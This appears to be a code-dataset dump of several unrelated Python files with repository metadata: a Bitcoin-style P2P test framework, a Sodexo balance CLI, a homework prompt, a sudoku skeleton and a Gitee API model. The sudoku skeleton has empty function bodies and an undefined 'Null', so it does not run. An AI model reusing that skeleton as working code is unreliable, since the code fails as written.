(msg truncated)" logger.debug(log_message) class P2PInterface(P2PConnection): """A high-level P2P interface class for communicating with a Bitcoin node. This class provides high-level callbacks for processing P2P message payloads, as well as convenience methods for interacting with the node over P2P. Individual testcases should subclass this and override the on_* methods if they want to alter message handling behaviour.""" def __init__(self): super().__init__() # Track number of messages of each type received and the most recent # message of each type self.message_count = defaultdict(int) self.last_message = {} # A count of the number of ping messages we've sent to the node self.ping_counter = 1 # The network services received from the peer self.nServices = 0 def peer_connect(self, *args, services=NODE_NETWORK|NODE_WITNESS, send_version=True, **kwargs): super().peer_connect(*args, **kwargs) if send_version: # Send a version msg vt = msg_version() vt.nServices = services vt.addrTo.ip = self.dstaddr vt.addrTo.port = self.dstport vt.addrFrom.ip = "0.0.0.0" vt.addrFrom.port = 0 self.send_message(vt, True) # Message receiving methods def on_message(self, message): """Receive message and dispatch message to appropriate callback. We keep a count of how many of each message type has been received and the most recent message of each type.""" with mininode_lock: try: command = message.command.decode('ascii') self.message_count[command] += 1 self.last_message[command] = message getattr(self, 'on_' + command)(message) except: print("ERROR delivering %s (%s)" % (repr(message), sys.exc_info()[0])) raise # Callback methods. Can be overridden by subclasses in individual test # cases to provide custom message handling behaviour. 
def on_open(self): pass def on_close(self): pass def on_addr(self, message): pass def on_block(self, message): pass def on_blocktxn(self, message): pass def on_cmpctblock(self, message): pass def on_feefilter(self, message): pass def on_getaddr(self, message): pass def on_getblocks(self, message): pass def on_getblocktxn(self, message): pass def on_getdata(self, message): pass def on_getheaders(self, message): pass def on_headers(self, message): pass def on_mempool(self, message): pass def on_pong(self, message): pass def on_reject(self, message): pass def on_sendcmpct(self, message): pass def on_sendheaders(self, message): pass def on_tx(self, message): pass def on_inv(self, message): want = msg_getdata() for i in message.inv: if i.type != 0: want.inv.append(i) if len(want.inv): self.send_message(want) def on_ping(self, message): self.send_message(msg_pong(message.nonce)) def on_verack(self, message): self.verack_received = True def on_version(self, message): assert message.nVersion >= MIN_VERSION_SUPPORTED, "Version {} received. 
Test framework only supports versions greater than {}".format(message.nVersion, MIN_VERSION_SUPPORTED) self.send_message(msg_verack()) self.nServices = message.nServices # Connection helper methods def wait_for_disconnect(self, timeout=60): test_function = lambda: self.state != "connected" wait_until(test_function, timeout=timeout, lock=mininode_lock) # Message receiving helper methods def wait_for_block(self, blockhash, timeout=60): test_function = lambda: self.last_message.get("block") and self.last_message["block"].block.rehash() == blockhash wait_until(test_function, timeout=timeout, lock=mininode_lock) def wait_for_getdata(self, timeout=60): test_function = lambda: self.last_message.get("getdata") wait_until(test_function, timeout=timeout, lock=mininode_lock) def wait_for_getheaders(self, timeout=60): test_function = lambda: self.last_message.get("getheaders") wait_until(test_function, timeout=timeout, lock=mininode_lock) def wait_for_inv(self, expected_inv, timeout=60): """Waits for an INV message and checks that the first inv object in the message was as expected.""" if len(expected_inv) > 1: raise NotImplementedError("wait_for_inv() will only verify the first inv object") test_function = lambda: self.last_message.get("inv") and \ self.last_message["inv"].inv[0].type == expected_inv[0].type and \ self.last_message["inv"].inv[0].hash == expected_inv[0].hash wait_until(test_function, timeout=timeout, lock=mininode_lock) def wait_for_verack(self, timeout=60): test_function = lambda: self.message_count["verack"] wait_until(test_function, timeout=timeout, lock=mininode_lock) # Message sending helper functions def send_and_ping(self, message): self.send_message(message) self.sync_with_ping() # Sync up with the node def sync_with_ping(self, timeout=60): self.send_message(msg_ping(nonce=self.ping_counter)) test_function = lambda: self.last_message.get("pong") and self.last_message["pong"].nonce == self.ping_counter wait_until(test_function, timeout=timeout, 
lock=mininode_lock) self.ping_counter += 1 # Keep our own socket map for asyncore, so that we can track disconnects # ourselves (to workaround an issue with closing an asyncore socket when # using select) mininode_socket_map = dict() # One lock for synchronizing all data access between the networking thread (see # NetworkThread below) and the thread running the test logic. For simplicity, # P2PConnection acquires this lock whenever delivering a message to a P2PInterface, # and whenever adding anything to the send buffer (in send_message()). This # lock should be acquired in the thread running the test logic to synchronize # access to any data shared with the P2PInterface or P2PConnection. mininode_lock = threading.RLock() class NetworkThread(threading.Thread): def __init__(self): super().__init__(name="NetworkThread") def run(self): while mininode_socket_map: # We check for whether to disconnect outside of the asyncore # loop to workaround the behavior of asyncore when using # select disconnected = [] for fd, obj in mininode_socket_map.items(): if obj.disconnect: disconnected.append(obj) [obj.handle_close() for obj in disconnected] asyncore.loop(0.1, use_poll=True, map=mininode_socket_map, count=1) logger.debug("Network thread closing") def network_thread_start(): """Start the network thread.""" # Only one network thread may run at a time assert not network_thread_running() NetworkThread().start() def network_thread_running(): """Return whether the network thread is running.""" return any([thread.name == "NetworkThread" for thread in threading.enumerate()]) def network_thread_join(timeout=10): """Wait timeout seconds for the network thread to terminate. Throw if the network thread doesn't terminate in timeout seconds.""" network_threads = [thread for thread in threading.enumerate() if thread.name == "NetworkThread"] assert len(network_threads) <= 1 for thread in network_threads: thread.join(timeout) assert not thread.is_alive()
37.598194
182
0.635447
import asyncore from collections import defaultdict from io import BytesIO import logging import socket import struct import sys import threading from test_framework.messages import * from test_framework.util import wait_until logger = logging.getLogger("TestFramework.mininode") MESSAGEMAP = { b"addr": msg_addr, b"block": msg_block, b"blocktxn": msg_blocktxn, b"cmpctblock": msg_cmpctblock, b"feefilter": msg_feefilter, b"getaddr": msg_getaddr, b"getblocks": msg_getblocks, b"getblocktxn": msg_getblocktxn, b"getdata": msg_getdata, b"getheaders": msg_getheaders, b"headers": msg_headers, b"inv": msg_inv, b"mempool": msg_mempool, b"ping": msg_ping, b"pong": msg_pong, b"reject": msg_reject, b"sendcmpct": msg_sendcmpct, b"sendheaders": msg_sendheaders, b"tx": msg_tx, b"verack": msg_verack, b"version": msg_version, } MAGIC_BYTES = { "mainnet": b"\xfb\xc0\xb6\xdb", "testnet4": b"\xfd\xd2\xc8\xf1", "regtest": b"\xfa\xbf\xb5\xda", } class P2PConnection(asyncore.dispatcher): def __init__(self): assert not network_thread_running() super().__init__(map=mininode_socket_map) def peer_connect(self, dstaddr, dstport, net="regtest"): self.dstaddr = dstaddr self.dstport = dstport self.create_socket(socket.AF_INET, socket.SOCK_STREAM) self.socket.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1) self.sendbuf = b"" self.recvbuf = b"" self.state = "connecting" self.network = net self.disconnect = False logger.info('Connecting to Actinium Node: %s:%d' % (self.dstaddr, self.dstport)) try: self.connect((dstaddr, dstport)) except: self.handle_close() def peer_disconnect(self): if self.state == "connected": self.disconnect_node() def handle_connect(self): if self.state != "connected": logger.debug("Connected & Listening: %s:%d" % (self.dstaddr, self.dstport)) self.state = "connected" self.on_open() def handle_close(self): logger.debug("Closing connection to: %s:%d" % (self.dstaddr, self.dstport)) self.state = "closed" self.recvbuf = b"" self.sendbuf = b"" try: self.close() except: pass 
self.on_close() def disconnect_node(self): self.disconnect = True def handle_read(self): t = self.recv(8192) if len(t) > 0: self.recvbuf += t self._on_data() def _on_data(self): try: while True: if len(self.recvbuf) < 4: return if self.recvbuf[:4] != MAGIC_BYTES[self.network]: raise ValueError("got garbage %s" % repr(self.recvbuf)) if len(self.recvbuf) < 4 + 12 + 4 + 4: return command = self.recvbuf[4:4+12].split(b"\x00", 1)[0] msglen = struct.unpack("<i", self.recvbuf[4+12:4+12+4])[0] checksum = self.recvbuf[4+12+4:4+12+4+4] if len(self.recvbuf) < 4 + 12 + 4 + 4 + msglen: return msg = self.recvbuf[4+12+4+4:4+12+4+4+msglen] th = sha256(msg) h = sha256(th) if checksum != h[:4]: raise ValueError("got bad checksum " + repr(self.recvbuf)) self.recvbuf = self.recvbuf[4+12+4+4+msglen:] if command not in MESSAGEMAP: raise ValueError("Received unknown command from %s:%d: '%s' %s" % (self.dstaddr, self.dstport, command, repr(msg))) f = BytesIO(msg) t = MESSAGEMAP[command]() t.deserialize(f) self._log_message("receive", t) self.on_message(t) except Exception as e: logger.exception('Error reading message:', repr(e)) raise def on_message(self, message): raise NotImplementedError def writable(self): with mininode_lock: pre_connection = self.state == "connecting" length = len(self.sendbuf) return (length > 0 or pre_connection) def handle_write(self): with mininode_lock: if self.state == "connecting": self.handle_connect() if not self.writable(): return try: sent = self.send(self.sendbuf) except: self.handle_close() return self.sendbuf = self.sendbuf[sent:] def send_message(self, message, pushbuf=False): if self.state != "connected" and not pushbuf: raise IOError('Not connected, no pushbuf') self._log_message("send", message) command = message.command data = message.serialize() tmsg = MAGIC_BYTES[self.network] tmsg += command tmsg += b"\x00" * (12 - len(command)) tmsg += struct.pack("<I", len(data)) th = sha256(data) h = sha256(th) tmsg += h[:4] tmsg += data with mininode_lock: 
if (len(self.sendbuf) == 0 and not pushbuf): try: sent = self.send(tmsg) self.sendbuf = tmsg[sent:] except BlockingIOError: self.sendbuf = tmsg else: self.sendbuf += tmsg def _log_message(self, direction, msg): if direction == "send": log_message = "Send message to " elif direction == "receive": log_message = "Received message from " log_message += "%s:%d: %s" % (self.dstaddr, self.dstport, repr(msg)[:500]) if len(log_message) > 500: log_message += "... (msg truncated)" logger.debug(log_message) class P2PInterface(P2PConnection): def __init__(self): super().__init__() self.message_count = defaultdict(int) self.last_message = {} self.ping_counter = 1 # The network services received from the peer self.nServices = 0 def peer_connect(self, *args, services=NODE_NETWORK|NODE_WITNESS, send_version=True, **kwargs): super().peer_connect(*args, **kwargs) if send_version: # Send a version msg vt = msg_version() vt.nServices = services vt.addrTo.ip = self.dstaddr vt.addrTo.port = self.dstport vt.addrFrom.ip = "0.0.0.0" vt.addrFrom.port = 0 self.send_message(vt, True) # Message receiving methods def on_message(self, message): with mininode_lock: try: command = message.command.decode('ascii') self.message_count[command] += 1 self.last_message[command] = message getattr(self, 'on_' + command)(message) except: print("ERROR delivering %s (%s)" % (repr(message), sys.exc_info()[0])) raise # Callback methods. Can be overridden by subclasses in individual test # cases to provide custom message handling behaviour. 
def on_open(self): pass def on_close(self): pass def on_addr(self, message): pass def on_block(self, message): pass def on_blocktxn(self, message): pass def on_cmpctblock(self, message): pass def on_feefilter(self, message): pass def on_getaddr(self, message): pass def on_getblocks(self, message): pass def on_getblocktxn(self, message): pass def on_getdata(self, message): pass def on_getheaders(self, message): pass def on_headers(self, message): pass def on_mempool(self, message): pass def on_pong(self, message): pass def on_reject(self, message): pass def on_sendcmpct(self, message): pass def on_sendheaders(self, message): pass def on_tx(self, message): pass def on_inv(self, message): want = msg_getdata() for i in message.inv: if i.type != 0: want.inv.append(i) if len(want.inv): self.send_message(want) def on_ping(self, message): self.send_message(msg_pong(message.nonce)) def on_verack(self, message): self.verack_received = True def on_version(self, message): assert message.nVersion >= MIN_VERSION_SUPPORTED, "Version {} received. 
Test framework only supports versions greater than {}".format(message.nVersion, MIN_VERSION_SUPPORTED) self.send_message(msg_verack()) self.nServices = message.nServices # Connection helper methods def wait_for_disconnect(self, timeout=60): test_function = lambda: self.state != "connected" wait_until(test_function, timeout=timeout, lock=mininode_lock) # Message receiving helper methods def wait_for_block(self, blockhash, timeout=60): test_function = lambda: self.last_message.get("block") and self.last_message["block"].block.rehash() == blockhash wait_until(test_function, timeout=timeout, lock=mininode_lock) def wait_for_getdata(self, timeout=60): test_function = lambda: self.last_message.get("getdata") wait_until(test_function, timeout=timeout, lock=mininode_lock) def wait_for_getheaders(self, timeout=60): test_function = lambda: self.last_message.get("getheaders") wait_until(test_function, timeout=timeout, lock=mininode_lock) def wait_for_inv(self, expected_inv, timeout=60): if len(expected_inv) > 1: raise NotImplementedError("wait_for_inv() will only verify the first inv object") test_function = lambda: self.last_message.get("inv") and \ self.last_message["inv"].inv[0].type == expected_inv[0].type and \ self.last_message["inv"].inv[0].hash == expected_inv[0].hash wait_until(test_function, timeout=timeout, lock=mininode_lock) def wait_for_verack(self, timeout=60): test_function = lambda: self.message_count["verack"] wait_until(test_function, timeout=timeout, lock=mininode_lock) # Message sending helper functions def send_and_ping(self, message): self.send_message(message) self.sync_with_ping() # Sync up with the node def sync_with_ping(self, timeout=60): self.send_message(msg_ping(nonce=self.ping_counter)) test_function = lambda: self.last_message.get("pong") and self.last_message["pong"].nonce == self.ping_counter wait_until(test_function, timeout=timeout, lock=mininode_lock) self.ping_counter += 1 # Keep our own socket map for asyncore, so that we can track 
disconnects # ourselves (to workaround an issue with closing an asyncore socket when # using select) mininode_socket_map = dict() # One lock for synchronizing all data access between the networking thread (see # NetworkThread below) and the thread running the test logic. For simplicity, # P2PConnection acquires this lock whenever delivering a message to a P2PInterface, # and whenever adding anything to the send buffer (in send_message()). This # lock should be acquired in the thread running the test logic to synchronize # access to any data shared with the P2PInterface or P2PConnection. mininode_lock = threading.RLock() class NetworkThread(threading.Thread): def __init__(self): super().__init__(name="NetworkThread") def run(self): while mininode_socket_map: # We check for whether to disconnect outside of the asyncore # loop to workaround the behavior of asyncore when using # select disconnected = [] for fd, obj in mininode_socket_map.items(): if obj.disconnect: disconnected.append(obj) [obj.handle_close() for obj in disconnected] asyncore.loop(0.1, use_poll=True, map=mininode_socket_map, count=1) logger.debug("Network thread closing") def network_thread_start(): # Only one network thread may run at a time assert not network_thread_running() NetworkThread().start() def network_thread_running(): return any([thread.name == "NetworkThread" for thread in threading.enumerate()]) def network_thread_join(timeout=10): network_threads = [thread for thread in threading.enumerate() if thread.name == "NetworkThread"] assert len(network_threads) <= 1 for thread in network_threads: thread.join(timeout) assert not thread.is_alive()
true
true
f705e7e9ad7e6291fc8bcef3839455d8f43946dd
3,324
py
Python
mysodexo/cli.py
AndreMiras/mysodexo
3d0836c38e10d579a8758b998744d1a38ff77260
[ "MIT" ]
9
2019-11-13T08:15:51.000Z
2022-03-07T18:48:28.000Z
mysodexo/cli.py
AndreMiras/mysodexo
3d0836c38e10d579a8758b998744d1a38ff77260
[ "MIT" ]
3
2019-11-13T16:45:33.000Z
2021-10-21T10:47:54.000Z
mysodexo/cli.py
AndreMiras/mysodexo
3d0836c38e10d579a8758b998744d1a38ff77260
[ "MIT" ]
1
2020-10-10T10:22:37.000Z
2020-10-10T10:22:37.000Z
#!/usr/bin/env python3 import argparse import os import pickle from getpass import getpass from typing import Tuple import requests from appdirs import user_cache_dir from mysodexo import api from mysodexo.constants import APPLICATION_NAME, SESSION_CACHE_FILENAME def prompt_login() -> Tuple[str, str]: """Prompts user for credentials and the returns them as a tuple.""" email = input("email: ") password = getpass("password: ") return (email, password) def get_session_cache_path() -> str: return os.path.join( user_cache_dir(appname=APPLICATION_NAME), SESSION_CACHE_FILENAME ) def get_cached_session_info() -> Tuple[ requests.cookies.RequestsCookieJar, str ]: """Returns session and DNI from cache.""" session_cache_path = get_session_cache_path() with open(session_cache_path, "rb") as f: cached_session_info = pickle.load(f) cookies = cached_session_info["cookies"] dni = cached_session_info["dni"] return (cookies, dni) def cache_session_info( cookies: requests.cookies.RequestsCookieJar, dni: str ) -> None: """Stores session info to cache.""" session_cache_path = get_session_cache_path() cached_session_info = { "cookies": cookies, "dni": dni, } os.makedirs(os.path.dirname(session_cache_path), exist_ok=True) with open(session_cache_path, "wb") as f: pickle.dump(cached_session_info, f) def login() -> Tuple[requests.sessions.Session, str]: """Logins and returns session info.""" email, password = prompt_login() session, account_info = api.login(email, password) dni = account_info["dni"] return (session, dni) def process_login() -> Tuple[requests.sessions.Session, str]: """Logins and stores session info to cache.""" session, dni = login() cache_session_info(session.cookies, dni) return (session, dni) def get_session_or_login() -> Tuple[requests.sessions.Session, str]: """Retrieves session from cache or prompts login then stores session.""" try: cookies, dni = get_cached_session_info() session = requests.session() session.cookies.update(cookies) except FileNotFoundError: session, 
dni = process_login() return session, dni def print_balance(cards): """Prints per card balance.""" for card in cards: pan = card["pan"] details = card["_details"] balance = details["cardBalance"] print(f"{pan}: {balance}") def process_balance(): session, dni = get_session_or_login() cards = api.get_cards(session, dni) for card in cards: card_number = card["cardNumber"] details = api.get_detail_card(session, card_number) card["_details"] = details print_balance(cards) def main(): parser = argparse.ArgumentParser( description="MySodexo Command Line Interface" ) parser.add_argument( "--login", action="store_true", help="Logins and store session.", ) parser.add_argument( "--balance", action="store_true", help="Returns account balance per card", ) args = parser.parse_args() if args.login: process_login() elif args.balance: process_balance() else: parser.print_help() if __name__ == "__main__": main()
27.245902
76
0.671781
import argparse import os import pickle from getpass import getpass from typing import Tuple import requests from appdirs import user_cache_dir from mysodexo import api from mysodexo.constants import APPLICATION_NAME, SESSION_CACHE_FILENAME def prompt_login() -> Tuple[str, str]: email = input("email: ") password = getpass("password: ") return (email, password) def get_session_cache_path() -> str: return os.path.join( user_cache_dir(appname=APPLICATION_NAME), SESSION_CACHE_FILENAME ) def get_cached_session_info() -> Tuple[ requests.cookies.RequestsCookieJar, str ]: session_cache_path = get_session_cache_path() with open(session_cache_path, "rb") as f: cached_session_info = pickle.load(f) cookies = cached_session_info["cookies"] dni = cached_session_info["dni"] return (cookies, dni) def cache_session_info( cookies: requests.cookies.RequestsCookieJar, dni: str ) -> None: session_cache_path = get_session_cache_path() cached_session_info = { "cookies": cookies, "dni": dni, } os.makedirs(os.path.dirname(session_cache_path), exist_ok=True) with open(session_cache_path, "wb") as f: pickle.dump(cached_session_info, f) def login() -> Tuple[requests.sessions.Session, str]: email, password = prompt_login() session, account_info = api.login(email, password) dni = account_info["dni"] return (session, dni) def process_login() -> Tuple[requests.sessions.Session, str]: session, dni = login() cache_session_info(session.cookies, dni) return (session, dni) def get_session_or_login() -> Tuple[requests.sessions.Session, str]: try: cookies, dni = get_cached_session_info() session = requests.session() session.cookies.update(cookies) except FileNotFoundError: session, dni = process_login() return session, dni def print_balance(cards): for card in cards: pan = card["pan"] details = card["_details"] balance = details["cardBalance"] print(f"{pan}: {balance}") def process_balance(): session, dni = get_session_or_login() cards = api.get_cards(session, dni) for card in cards: card_number = 
card["cardNumber"] details = api.get_detail_card(session, card_number) card["_details"] = details print_balance(cards) def main(): parser = argparse.ArgumentParser( description="MySodexo Command Line Interface" ) parser.add_argument( "--login", action="store_true", help="Logins and store session.", ) parser.add_argument( "--balance", action="store_true", help="Returns account balance per card", ) args = parser.parse_args() if args.login: process_login() elif args.balance: process_balance() else: parser.print_help() if __name__ == "__main__": main()
true
true
f705e87ae9a2d445b3fb793b75ab4fa77992ea13
755
py
Python
DZ16_04/less11_5.py
denyskovalev/hillel_school_python
df75b3d6779fd03bc94278d27508cc3e461ab421
[ "MIT" ]
null
null
null
DZ16_04/less11_5.py
denyskovalev/hillel_school_python
df75b3d6779fd03bc94278d27508cc3e461ab421
[ "MIT" ]
null
null
null
DZ16_04/less11_5.py
denyskovalev/hillel_school_python
df75b3d6779fd03bc94278d27508cc3e461ab421
[ "MIT" ]
null
null
null
# Реалізувати клас Герой що має мати наступні атрибути: ім‘я, здоров‘я, ранг, сила і метод вдарити. # Метод вдарити повинен наносити шкоду противнику в розмірі сили героя. Герой має мати наступні # обмеження: здоров‘я від 0 до 100, ранг 1,2,3. Сила не більше 10% теперішнього здоров‘я героя. # Не можна бити героїв здоров‘я яких менше 5. # # Реалізувати клас маг, який може відновлювати здоров'я інших героїв, також він має ранг як герой і # може наносити удари. За відновлення здоров'я він бере гроші. ( Вам потрібно реалізувати цей функціонал ). # Герой заробляє гроші за перемогу у бою з іншим героєм, також при перемозі він забирає всі гроші суперника. # Скільки герой отримує грошей за перемогу і скільки коштує відновити здоров'я, на ваш розсуд)
58.076923
108
0.774834
# може наносити удари. За відновлення здоров'я він бере гроші. ( Вам потрібно реалізувати цей функціонал ).
true
true
f705e88b99176b040f97721c78c6232811d99bc9
2,592
py
Python
sudoku skeleton,blocks and solution/sudoku_skeleton.py
AvantG/robotics
f97e2ab6a52aad901d968b960c25e91556bdcc86
[ "MIT" ]
null
null
null
sudoku skeleton,blocks and solution/sudoku_skeleton.py
AvantG/robotics
f97e2ab6a52aad901d968b960c25e91556bdcc86
[ "MIT" ]
null
null
null
sudoku skeleton,blocks and solution/sudoku_skeleton.py
AvantG/robotics
f97e2ab6a52aad901d968b960c25e91556bdcc86
[ "MIT" ]
null
null
null
import copy ########################################### This function reads in block from file def grid_from_file(file_name): lst=[] f=open(file_name) for line in f: lst2=[] for i in line: if i == "x": lst2.append(i) elif i.isdigit(): lst2.append(int(i)) lst.append(lst2) return lst ################################################## def subgrid_values(grid, row, col): val = [] #get dimension of inner box n = int(len(grid)**(0.5)) #get starting row and starting col r = (row//n)*n c = (col//n)*n for i in range(r, r+n): for j in range(c, c+n): val.append(grid[i][j]) return val # This returns a list of values in the subgrid def column_values(grid,col): val=[] n=len(grid) for i in range(n): val.append(grid[i][col]) return val #This returns a list of values in the column def row_values(grid,row): val=[] n=len(grid) for i in range(n): val.append(grid[row][i]) return val #This returns a list of values in the row ################################################# def valid_entry(grid,num,r,c): check1=num not in column_values(grid,c) check2=num not in row_values(grid,r) check3=num not in subgrid_values(grid,r,c) if check1 and check2 and check3: return True return False ################################################### def grids_augmented_in_row(grid,num,r): #Write code here #################################################### This should recursively use the function above to def grids_augmented_with_number(grid,num): #Write code here #################################################### This should recursively use the function above to complete the sudoku puzzle. 
def solve_sudoku(file_name): #Write code here #################################################### this makes a function that chooses sudoku block based of numbers def block_selector(number): if number==1: return "gridA.txt" elif number==2: return "gridB.txt" elif number==3: return "gridC.txt" elif number==4: return "gridD.txt" elif number==5: return "gridE.txt" elif number==6: return "gridF.txt" else: return Null #################################################### this solves the block, change number variable to swap blocks number=6 print(solve_sudoku(block_selector(number)))
32.4
131
0.505787
import copy
false
true
f705e8be9f1c5b46fb2b7a7156603fafbace0312
14,306
py
Python
gitee/models/body19.py
pygitee/pygitee
7622314a4dbb08cf2f729b6cdd0a2887b96e394e
[ "MIT" ]
null
null
null
gitee/models/body19.py
pygitee/pygitee
7622314a4dbb08cf2f729b6cdd0a2887b96e394e
[ "MIT" ]
null
null
null
gitee/models/body19.py
pygitee/pygitee
7622314a4dbb08cf2f729b6cdd0a2887b96e394e
[ "MIT" ]
null
null
null
# coding: utf-8 import pprint import re # noqa: F401 import six class Body19(object): """NOTE: This class is auto generated by the swagger code generator program. Do not edit the class manually. """ """ Attributes: swagger_types (dict): The key is attribute name and the value is attribute type. attribute_map (dict): The key is attribute name and the value is json key in definition. """ swagger_types = { 'access_token': 'str', 'name': 'str', 'description': 'str', 'homepage': 'str', 'has_issues': 'bool', 'has_wiki': 'bool', 'can_comment': 'bool', 'issue_comment': 'bool', 'security_hole_enabled': 'bool', 'private': 'bool', 'path': 'str', 'default_branch': 'str', 'pull_requests_enabled': 'bool', 'online_edit_enabled': 'bool', 'lightweight_pr_enabled': 'bool' } attribute_map = { 'access_token': 'access_token', 'name': 'name', 'description': 'description', 'homepage': 'homepage', 'has_issues': 'has_issues', 'has_wiki': 'has_wiki', 'can_comment': 'can_comment', 'issue_comment': 'issue_comment', 'security_hole_enabled': 'security_hole_enabled', 'private': 'private', 'path': 'path', 'default_branch': 'default_branch', 'pull_requests_enabled': 'pull_requests_enabled', 'online_edit_enabled': 'online_edit_enabled', 'lightweight_pr_enabled': 'lightweight_pr_enabled' } def __init__(self, access_token=None, name=None, description=None, homepage=None, has_issues=True, has_wiki=True, can_comment=True, issue_comment=None, security_hole_enabled=None, private=None, path=None, default_branch=None, pull_requests_enabled=None, online_edit_enabled=None, lightweight_pr_enabled=None): # noqa: E501 """Body19 - a model defined in Swagger""" # noqa: E501 self._access_token = None self._name = None self._description = None self._homepage = None self._has_issues = None self._has_wiki = None self._can_comment = None self._issue_comment = None self._security_hole_enabled = None self._private = None self._path = None self._default_branch = None self._pull_requests_enabled = None 
self._online_edit_enabled = None self._lightweight_pr_enabled = None self.discriminator = None if access_token is not None: self.access_token = access_token self.name = name if description is not None: self.description = description if homepage is not None: self.homepage = homepage if has_issues is not None: self.has_issues = has_issues if has_wiki is not None: self.has_wiki = has_wiki if can_comment is not None: self.can_comment = can_comment if issue_comment is not None: self.issue_comment = issue_comment if security_hole_enabled is not None: self.security_hole_enabled = security_hole_enabled if private is not None: self.private = private if path is not None: self.path = path if default_branch is not None: self.default_branch = default_branch if pull_requests_enabled is not None: self.pull_requests_enabled = pull_requests_enabled if online_edit_enabled is not None: self.online_edit_enabled = online_edit_enabled if lightweight_pr_enabled is not None: self.lightweight_pr_enabled = lightweight_pr_enabled @property def access_token(self): """Gets the access_token of this Body19. # noqa: E501 用户授权码 # noqa: E501 :return: The access_token of this Body19. # noqa: E501 :rtype: str """ return self._access_token @access_token.setter def access_token(self, access_token): """Sets the access_token of this Body19. 用户授权码 # noqa: E501 :param access_token: The access_token of this Body19. # noqa: E501 :type: str """ self._access_token = access_token @property def name(self): """Gets the name of this Body19. # noqa: E501 仓库名称 # noqa: E501 :return: The name of this Body19. # noqa: E501 :rtype: str """ return self._name @name.setter def name(self, name): """Sets the name of this Body19. 仓库名称 # noqa: E501 :param name: The name of this Body19. # noqa: E501 :type: str """ if name is None: raise ValueError("Invalid value for `name`, must not be `None`") # noqa: E501 self._name = name @property def description(self): """Gets the description of this Body19. 
# noqa: E501 仓库描述 # noqa: E501 :return: The description of this Body19. # noqa: E501 :rtype: str """ return self._description @description.setter def description(self, description): """Sets the description of this Body19. 仓库描述 # noqa: E501 :param description: The description of this Body19. # noqa: E501 :type: str """ self._description = description @property def homepage(self): """Gets the homepage of this Body19. # noqa: E501 主页(eg: https://gitee.com) # noqa: E501 :return: The homepage of this Body19. # noqa: E501 :rtype: str """ return self._homepage @homepage.setter def homepage(self, homepage): """Sets the homepage of this Body19. 主页(eg: https://gitee.com) # noqa: E501 :param homepage: The homepage of this Body19. # noqa: E501 :type: str """ self._homepage = homepage @property def has_issues(self): """Gets the has_issues of this Body19. # noqa: E501 允许提Issue与否。默认: 允许(true) # noqa: E501 :return: The has_issues of this Body19. # noqa: E501 :rtype: bool """ return self._has_issues @has_issues.setter def has_issues(self, has_issues): """Sets the has_issues of this Body19. 允许提Issue与否。默认: 允许(true) # noqa: E501 :param has_issues: The has_issues of this Body19. # noqa: E501 :type: bool """ self._has_issues = has_issues @property def has_wiki(self): """Gets the has_wiki of this Body19. # noqa: E501 提供Wiki与否。默认: 提供(true) # noqa: E501 :return: The has_wiki of this Body19. # noqa: E501 :rtype: bool """ return self._has_wiki @has_wiki.setter def has_wiki(self, has_wiki): """Sets the has_wiki of this Body19. 提供Wiki与否。默认: 提供(true) # noqa: E501 :param has_wiki: The has_wiki of this Body19. # noqa: E501 :type: bool """ self._has_wiki = has_wiki @property def can_comment(self): """Gets the can_comment of this Body19. # noqa: E501 允许用户对仓库进行评论。默认: 允许(true) # noqa: E501 :return: The can_comment of this Body19. # noqa: E501 :rtype: bool """ return self._can_comment @can_comment.setter def can_comment(self, can_comment): """Sets the can_comment of this Body19. 
允许用户对仓库进行评论。默认: 允许(true) # noqa: E501 :param can_comment: The can_comment of this Body19. # noqa: E501 :type: bool """ self._can_comment = can_comment @property def issue_comment(self): """Gets the issue_comment of this Body19. # noqa: E501 允许对“关闭”状态的 Issue 进行评论。默认: 不允许(false) # noqa: E501 :return: The issue_comment of this Body19. # noqa: E501 :rtype: bool """ return self._issue_comment @issue_comment.setter def issue_comment(self, issue_comment): """Sets the issue_comment of this Body19. 允许对“关闭”状态的 Issue 进行评论。默认: 不允许(false) # noqa: E501 :param issue_comment: The issue_comment of this Body19. # noqa: E501 :type: bool """ self._issue_comment = issue_comment @property def security_hole_enabled(self): """Gets the security_hole_enabled of this Body19. # noqa: E501 允许用户创建涉及敏感信息的 Issue。默认: 不允许(false) # noqa: E501 :return: The security_hole_enabled of this Body19. # noqa: E501 :rtype: bool """ return self._security_hole_enabled @security_hole_enabled.setter def security_hole_enabled(self, security_hole_enabled): """Sets the security_hole_enabled of this Body19. 允许用户创建涉及敏感信息的 Issue。默认: 不允许(false) # noqa: E501 :param security_hole_enabled: The security_hole_enabled of this Body19. # noqa: E501 :type: bool """ self._security_hole_enabled = security_hole_enabled @property def private(self): """Gets the private of this Body19. # noqa: E501 仓库公开或私有。 # noqa: E501 :return: The private of this Body19. # noqa: E501 :rtype: bool """ return self._private @private.setter def private(self, private): """Sets the private of this Body19. 仓库公开或私有。 # noqa: E501 :param private: The private of this Body19. # noqa: E501 :type: bool """ self._private = private @property def path(self): """Gets the path of this Body19. # noqa: E501 更新仓库路径 # noqa: E501 :return: The path of this Body19. # noqa: E501 :rtype: str """ return self._path @path.setter def path(self, path): """Sets the path of this Body19. 更新仓库路径 # noqa: E501 :param path: The path of this Body19. 
# noqa: E501 :type: str """ self._path = path @property def default_branch(self): """Gets the default_branch of this Body19. # noqa: E501 更新默认分支 # noqa: E501 :return: The default_branch of this Body19. # noqa: E501 :rtype: str """ return self._default_branch @default_branch.setter def default_branch(self, default_branch): """Sets the default_branch of this Body19. 更新默认分支 # noqa: E501 :param default_branch: The default_branch of this Body19. # noqa: E501 :type: str """ self._default_branch = default_branch @property def pull_requests_enabled(self): """Gets the pull_requests_enabled of this Body19. # noqa: E501 接受 pull request,协作开发 # noqa: E501 :return: The pull_requests_enabled of this Body19. # noqa: E501 :rtype: bool """ return self._pull_requests_enabled @pull_requests_enabled.setter def pull_requests_enabled(self, pull_requests_enabled): """Sets the pull_requests_enabled of this Body19. 接受 pull request,协作开发 # noqa: E501 :param pull_requests_enabled: The pull_requests_enabled of this Body19. # noqa: E501 :type: bool """ self._pull_requests_enabled = pull_requests_enabled @property def online_edit_enabled(self): """Gets the online_edit_enabled of this Body19. # noqa: E501 是否允许仓库文件在线编辑 # noqa: E501 :return: The online_edit_enabled of this Body19. # noqa: E501 :rtype: bool """ return self._online_edit_enabled @online_edit_enabled.setter def online_edit_enabled(self, online_edit_enabled): """Sets the online_edit_enabled of this Body19. 是否允许仓库文件在线编辑 # noqa: E501 :param online_edit_enabled: The online_edit_enabled of this Body19. # noqa: E501 :type: bool """ self._online_edit_enabled = online_edit_enabled @property def lightweight_pr_enabled(self): """Gets the lightweight_pr_enabled of this Body19. # 